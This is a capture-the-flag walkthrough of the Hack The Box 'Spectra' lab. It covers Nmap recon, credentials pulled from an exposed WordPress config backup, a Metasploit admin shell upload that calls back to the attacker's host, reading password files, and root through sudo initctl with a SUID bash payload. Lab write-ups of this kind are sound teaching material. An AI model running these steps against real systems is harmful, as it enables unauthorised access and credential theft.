Today we are going to accept the boot2root challenge of Spectra –Hack the box lab. Through this lab, we are going to check our skills in WordPress Exploitation and basic privilege escalation.
Table Of Content
Reconnaissance
·
Nmap
Enumeration
·
Website enumeration
Exploitation
·
WordPress Metasploit
Privilege Escalation
·
Abusing Sudo rights
Reconnaissance
Let’s start our journey.
Start Nmap scan to know the open ports and services running
on these ports.
Nmap –A 10.129.223.138
Through Nmap scan, we get to know that there are three open
ports i.e. Port 22 –SSH version OpenSSH 8.1, Port 80 –HTTP, and
port 3306 –MySQL.
First, we are exploring Port 80 in the web browser, and get a
simple page with having two links Software Issue Tracker and Test.
http:10.129.223.138
Enumeration
Before exploring the links found above. We need to edit the
host file and add spectra lab IP address 10.129.223.13
cat /etc/hosts
Now we will try to explore both links found after navigating port 80. Once we click on the test link we get the “error establishing a database connection”. It seems nothing important.
Look at the other link spectra.htb/testing, there are multiple file indexes as shown below image. For future analysis, we make our mind to open the wp-config.php save file.
Wp-config.php.save is the base configuration file for WordPress.After
access it through curl we find something interesting in it i.eMYSQL database
credential’s username ‘devtest’ and devteam01.
Curl http://spectra.htb/testing/wp-config.php.save
Happily, we login the WordPress but unfortunately, the above-found
credentials are not working, and getting the error” Unknown username. Check
again or try your email address”.
Spectra.htb/main/wp-login.php
Looking back, now it’s time to explore the first link
software issue tracker found on HTTP 80.
This takes us to a simple WordPress page and just a sample
post by the administrator. Through this, we get to know that we can try with
the username “Administrator”. Again we log in on the wp-login page.
Great!! Successfully we logged in and it redirects to the
administration email verification.
Just click on “This email is correct” and get into it.
Exploitation
After some enumeration, we find that the WordPress version
is not updated. Accordingly, we explore the Metasploit exploit and set the
required options as we have already fetched the username and password i.e.
administrator and devteam01 respectively. Below is the module:
Use/exploit/unix/webapp/wp_admin_shell_upload
Set rhosts 10.129.223.138
Set targeturi /main
Set password devteam01
Set lhost 10.10.14.100
exploit
Wow!! We have a meterpreter session. Let’s go for the post
enumeration for user.txt file and root.txt file.
While doing enumeration, we come across that except root and
ngix users there is another user name as “Katie”.
Cat /etc/passwd
Very soon we decide that user Katie does not have permission
to access user.txt.
Cd /home/Katie
Ls
Cat user.txt
Let’s enumerate furthermore, we hit in opt directory with a file
called “autologin.conf.orig”.c
cd opt
ls -la
After reading the autologin. config.orig file we get to know
that config file calls the credentials from passwd file placed at
/etc/autologin.
Cat autologin.config.orig
Go the path /etc/autologin and enumerate it, we will get the
password file. Read the password file.
Hurray!!! Get the Password is SummerHereWeCome!!
Cd /etc/autologin
Ls-la
Cat passwd
Privilege Escalation
SSH to user Katie, as we have the password for it. Through
the id command, we get to know that there is one developer’s group, simultaneously
we will check the sudoers permission we come across that user Katie has root permission
for /sbin/initctl. Now, exploring the developers' group there we get the test
config files. Then open the test configuration file, which is stored at
"/etc/init," as shown below.
Id
Sudo –l
Find / -type f –group developers 2>dev/null –ls
Cat /etc/init/test.conf
Edit the test config file and replace the existing content
with the following script:
Chmod +s /bin/bash
As Katie has root permission to execute the initctl, through
initctl we will start and stop the test and execute the /bin/bash –p command to
get the root.txt.
Finally, We capture the ROOT flag.
0 comments:
Post a Comment